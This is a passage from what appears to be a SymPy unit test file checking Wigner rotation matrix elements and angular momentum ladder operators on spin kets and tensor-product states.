assert Rotation.d(2, -2, 1, beta).doit() == (2 * sin(beta) - sin(2 * beta)) / 4
assert Rotation.d(2, -2, 0, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, -2, -1, beta).doit() == (cos(beta) + 1) * sin(beta) / 2
assert Rotation.d(2, -2, -2, beta).doit() == (3 + 4 * cos(beta) + cos(2 * beta)) / 8
# Numerical tests
# j = 1/2
assert Rotation.d(S.Half, S.Half, S.Half, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(S.Half, S.Half, Rational(-1, 2), pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(S.Half, Rational(-1, 2), S.Half, pi / 2).doit() == sqrt(2) / 2
assert (
Rotation.d(S.Half, Rational(-1, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(2) / 2
)
# j = 1
assert Rotation.d(1, 1, 1, pi / 2).doit() == S.Half
assert Rotation.d(1, 1, 0, pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(1, 1, -1, pi / 2).doit() == S.Half
assert Rotation.d(1, 0, 1, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(1, 0, 0, pi / 2).doit() == 0
assert Rotation.d(1, 0, -1, pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(1, -1, 1, pi / 2).doit() == S.Half
assert Rotation.d(1, -1, 0, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(1, -1, -1, pi / 2).doit() == S.Half
# j = 3/2
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(3, 2), pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), S.Half, pi / 2).doit()
== -sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-3, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(3, 2), pi / 2).doit() == sqrt(6) / 4
)
assert Rotation.d(Rational(3, 2), S.Half, S.Half, pi / 2).doit() == -sqrt(2) / 4
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-1, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-3, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(3, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), S.Half, pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-1, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-3, 2), pi / 2).doit()
== -sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(3, 2), pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), S.Half, pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-3, 2), pi / 2).doit()
== sqrt(2) / 4
)
# j = 2
assert Rotation.d(2, 2, 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, 2, 1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 2, 0, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, 2, -1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 2, -2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, 1, 2, pi / 2).doit() == S.Half
assert Rotation.d(2, 1, 1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 1, 0, pi / 2).doit() == 0
assert Rotation.d(2, 1, -1, pi / 2).doit() == S.Half
assert Rotation.d(2, 1, -2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 0, 2, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, 0, 1, pi / 2).doit() == 0
assert Rotation.d(2, 0, 0, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 0, -1, pi / 2).doit() == 0
assert Rotation.d(2, 0, -2, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, -1, 2, pi / 2).doit() == S.Half
assert Rotation.d(2, -1, 1, pi / 2).doit() == S.Half
assert Rotation.d(2, -1, 0, pi / 2).doit() == 0
assert Rotation.d(2, -1, -1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, -1, -2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, -2, 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, -2, 1, pi / 2).doit() == S.Half
assert Rotation.d(2, -2, 0, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, -2, -1, pi / 2).doit() == S.Half
assert Rotation.d(2, -2, -2, pi / 2).doit() == Rational(1, 4)
def test_rotation_d():
# Symbolic tests
# j = 1/2
assert Rotation.D(S.Half, S.Half, S.Half, alpha, beta, gamma).doit() == cos(
beta / 2
) * exp(-I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
S.Half, S.Half, Rational(-1, 2), alpha, beta, gamma
).doit() == -sin(beta / 2) * exp(-I * alpha / 2) * exp(I * gamma / 2)
assert Rotation.D(
S.Half, Rational(-1, 2), S.Half, alpha, beta, gamma
).doit() == sin(beta / 2) * exp(I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
S.Half, Rational(-1, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == cos(beta / 2) * exp(I * alpha / 2) * exp(I * gamma / 2)
# j = 1
assert Rotation.D(1, 1, 1, alpha, beta, gamma).doit() == (1 + cos(beta)) / 2 * exp(
-I * alpha
) * exp(-I * gamma)
assert Rotation.D(1, 1, 0, alpha, beta, gamma).doit() == -sin(beta) / sqrt(2) * exp(
-I * alpha
)
assert Rotation.D(1, 1, -1, alpha, beta, gamma).doit() == (1 - cos(beta)) / 2 * exp(
-I * alpha
) * exp(I * gamma)
assert Rotation.D(1, 0, 1, alpha, beta, gamma).doit() == sin(beta) / sqrt(2) * exp(
-I * gamma
)
assert Rotation.D(1, 0, 0, alpha, beta, gamma).doit() == cos(beta)
assert Rotation.D(1, 0, -1, alpha, beta, gamma).doit() == -sin(beta) / sqrt(
2
) * exp(I * gamma)
assert Rotation.D(1, -1, 1, alpha, beta, gamma).doit() == (1 - cos(beta)) / 2 * exp(
I * alpha
) * exp(-I * gamma)
assert Rotation.D(1, -1, 0, alpha, beta, gamma).doit() == sin(beta) / sqrt(2) * exp(
I * alpha
)
assert Rotation.D(1, -1, -1, alpha, beta, gamma).doit() == (
1 + cos(beta)
) / 2 * exp(I * alpha) * exp(I * gamma)
# j = 3/2
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(3, 2), alpha, beta, gamma
).doit() == (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), S.Half, alpha, beta, gamma
).doit() == -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == (-3 * sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(Rational(3, 2), S.Half, S.Half, alpha, beta, gamma).doit() == (
cos(beta / 2) + 3 * cos(beta * Rational(3, 2))
) / 4 * exp(-I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(-1, 2), alpha, beta, gamma
).doit() == (sin(beta / 2) - 3 * sin(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(-3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), S.Half, alpha, beta, gamma
).doit() == (-sin(beta / 2) + 3 * sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(3, 2), alpha, beta, gamma
).doit() == (3 * sin(beta / 2) - sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), S.Half, alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma * Rational(3, 2)
)
# j = 2
assert Rotation.D(2, 2, 2, alpha, beta, gamma).doit() == (
3 + 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(-2 * I * alpha) * exp(-2 * I * gamma)
assert (
Rotation.D(2, 2, 1, alpha, beta, gamma).doit()
== -((cos(beta) + 1) * exp(-2 * I * alpha) * exp(-I * gamma) * sin(beta)) / 2
)
assert Rotation.D(2, 2, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(-2 * I * alpha)
assert Rotation.D(2, 2, -1, alpha, beta, gamma).doit() == (cos(beta) - 1) * sin(
beta
) / 2 * exp(-2 * I * alpha) * exp(I * gamma)
assert Rotation.D(2, 2, -2, alpha, beta, gamma).doit() == (
3 - 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(-2 * I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, 1, 2, alpha, beta, gamma).doit() == (cos(beta) + 1) * sin(
beta
) / 2 * exp(-I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, 1, 1, alpha, beta, gamma).doit() == (
cos(beta) + cos(2 * beta)
) / 2 * exp(-I * alpha) * exp(-I * gamma)
assert Rotation.D(2, 1, 0, alpha, beta, gamma).doit() == -sqrt(6) * sin(
2 * beta
) / 4 * exp(-I * alpha)
assert Rotation.D(2, 1, -1, alpha, beta, gamma).doit() == (
cos(beta) - cos(2 * beta)
) / 2 * exp(-I * alpha) * exp(I * gamma)
assert Rotation.D(2, 1, -2, alpha, beta, gamma).doit() == (cos(beta) - 1) * sin(
beta
) / 2 * exp(-I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, 0, 2, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(-2 * I * gamma)
assert Rotation.D(2, 0, 1, alpha, beta, gamma).doit() == sqrt(6) * sin(
2 * beta
) / 4 * exp(-I * gamma)
assert Rotation.D(2, 0, 0, alpha, beta, gamma).doit() == (1 + 3 * cos(2 * beta)) / 4
assert Rotation.D(2, 0, -1, alpha, beta, gamma).doit() == -sqrt(6) * sin(
2 * beta
) / 4 * exp(I * gamma)
assert Rotation.D(2, 0, -2, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(2 * I * gamma)
assert Rotation.D(2, -1, 2, alpha, beta, gamma).doit() == (
2 * sin(beta) - sin(2 * beta)
) / 4 * exp(I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, -1, 1, alpha, beta, gamma).doit() == (
cos(beta) - cos(2 * beta)
) / 2 * exp(I * alpha) * exp(-I * gamma)
assert Rotation.D(2, -1, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
2 * beta
) / 4 * exp(I * alpha)
assert Rotation.D(2, -1, -1, alpha, beta, gamma).doit() == (
cos(beta) + cos(2 * beta)
) / 2 * exp(I * alpha) * exp(I * gamma)
assert Rotation.D(2, -1, -2, alpha, beta, gamma).doit() == -(
(cos(beta) + 1) * sin(beta)
) / 2 * exp(I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, -2, 2, alpha, beta, gamma).doit() == (
3 - 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(2 * I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, -2, 1, alpha, beta, gamma).doit() == (
2 * sin(beta) - sin(2 * beta)
) / 4 * exp(2 * I * alpha) * exp(-I * gamma)
assert Rotation.D(2, -2, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(2 * I * alpha)
assert Rotation.D(2, -2, -1, alpha, beta, gamma).doit() == (cos(beta) + 1) * sin(
beta
) / 2 * exp(2 * I * alpha) * exp(I * gamma)
assert Rotation.D(2, -2, -2, alpha, beta, gamma).doit() == (
3 + 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(2 * I * alpha) * exp(2 * I * gamma)
# Numerical tests
# j = 1/2
assert (
Rotation.D(S.Half, S.Half, S.Half, pi / 2, pi / 2, pi / 2).doit()
== -I * sqrt(2) / 2
)
assert (
Rotation.D(S.Half, S.Half, Rational(-1, 2), pi / 2, pi / 2, pi / 2).doit()
== -sqrt(2) / 2
)
assert (
Rotation.D(S.Half, Rational(-1, 2), S.Half, pi / 2, pi / 2, pi / 2).doit()
== sqrt(2) / 2
)
assert (
Rotation.D(
S.Half, Rational(-1, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(2) / 2
)
# j = 1
assert Rotation.D(1, 1, 1, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.D(1, 1, 0, pi / 2, pi / 2, pi / 2).doit() == I * sqrt(2) / 2
assert Rotation.D(1, 1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(1, 0, 1, pi / 2, pi / 2, pi / 2).doit() == -I * sqrt(2) / 2
assert Rotation.D(1, 0, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(1, 0, -1, pi / 2, pi / 2, pi / 2).doit() == -I * sqrt(2) / 2
assert Rotation.D(1, -1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(1, -1, 0, pi / 2, pi / 2, pi / 2).doit() == I * sqrt(2) / 2
assert Rotation.D(1, -1, -1, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
# j = 3/2
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(6) / 4
)
assert (
Rotation.D(Rational(3, 2), S.Half, S.Half, pi / 2, pi / 2, pi / 2).doit()
== I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(2) / 4
)
# j = 2
assert Rotation.D(2, 2, 2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, 2, 1, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, 2, 0, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, 2, -1, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, 2, -2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, 1, 2, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, 1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, 1, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, 1, -2, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, 0, 2, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, 0, 1, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 0, 0, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.D(2, 0, -1, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 0, -2, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, -1, 2, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, -1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, -1, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, -1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, -1, -2, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, -2, 2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, -2, 1, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, -2, 0, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, -2, -1, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, -2, -2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
def test_wignerd():
assert Rotation.D(j, m, mp, alpha, beta, gamma) == WignerD(
j, m, mp, alpha, beta, gamma
)
assert Rotation.d(j, m, mp, beta) == WignerD(j, m, mp, 0, beta, 0)
def test_jplus():
assert Commutator(Jplus, Jminus).doit() == 2 * hbar * Jz
assert Jplus.matrix_element(1, 1, 1, 1) == 0
assert Jplus.rewrite("xyz") == Jx + I * Jy
# Normal operators, normal states
# Numerical
assert qapply(Jplus * JxKet(1, 1)) == -hbar * sqrt(2) * JxKet(
1, 0
) / 2 + hbar * JxKet(1, 1)
assert qapply(Jplus * JyKet(1, 1)) == hbar * sqrt(2) * JyKet(
1, 0
) / 2 + I * hbar * JyKet(1, 1)
assert qapply(Jplus * JzKet(1, 1)) == 0
# Symbolic
assert qapply(Jplus * JxKet(j, m)) == Sum(
hbar
* sqrt(-(mi ** 2) - mi + j ** 2 + j)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JyKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 - mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JzKet(j, m)) == hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(
j, m + 1
)
# Normal operators, coupled states
# Numerical
assert qapply(Jplus * JxKetCoupled(1, 1, (1, 1))) == -hbar * sqrt(2) * JxKetCoupled(
1, 0, (1, 1)
) / 2 + hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jplus * JyKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JyKetCoupled(
1, 0, (1, 1)
) / 2 + I * hbar * JyKetCoupled(1, 1, (1, 1))
assert qapply(Jplus * JzKet(1, 1)) == 0
# Symbolic
assert qapply(Jplus * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(-(mi ** 2) - mi + j ** 2 + j)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi + 1, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 - mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JzKetCoupled(j, m, (j1, j2))) == hbar * sqrt(
j ** 2 + j - m ** 2 - m
) * JzKetCoupled(j, m + 1, (j1, j2))
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * sqrt(2) * TensorProduct(
JxKet(1, 0), JxKet(1, -1)
) / 2 + hbar * TensorProduct(
JxKet(1, 1), JxKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jplus) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JyKet(1, 0), JyKet(1, -1)
) / 2 + hbar * I * TensorProduct(
JyKet(1, 1), JyKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jplus) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== -hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert (
qapply(TensorProduct(Jplus, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0))
# Symbolic
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(-(mi ** 2) - mi + j1 ** 2 + j1)
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* sqrt(-(mi ** 2) - mi + j2 ** 2 + j2)
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 - mi)
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 - mi)
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j1 ** 2 + j1 - m1 ** 2 - m1) * TensorProduct(
JzKet(j1, m1 + 1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j2 ** 2 + j2 - m2 ** 2 - m2) * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2 + 1)
)
def test_jminus():
assert qapply(Jminus * JzKet(1, -1)) == 0
assert Jminus.matrix_element(1, 0, 1, 1) == sqrt(2) * hbar
assert Jminus.rewrite("xyz") == Jx - I * Jy
# Normal operators, normal states
# Numerical
assert qapply(Jminus * JxKet(1, 1)) == hbar * sqrt(2) * JxKet(
1, 0
) / 2 + hbar * JxKet(1, 1)
assert qapply(Jminus * JyKet(1, 1)) == hbar * sqrt(2) * JyKet(
1, 0
) / 2 - hbar * I * JyKet(1, 1)
assert qapply(Jminus * JzKet(1, 1)) == sqrt(2) * hbar * JzKet(1, 0)
# Symbolic
assert qapply(Jminus * JxKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JyKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JzKet(j, m)) == hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(
j, m - 1
)
# Normal operators, coupled states
# Numerical
assert qapply(Jminus * JxKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JxKetCoupled(
1, 0, (1, 1)
) / 2 + hbar * JxKetCoupled(1, 1, (1, 1))
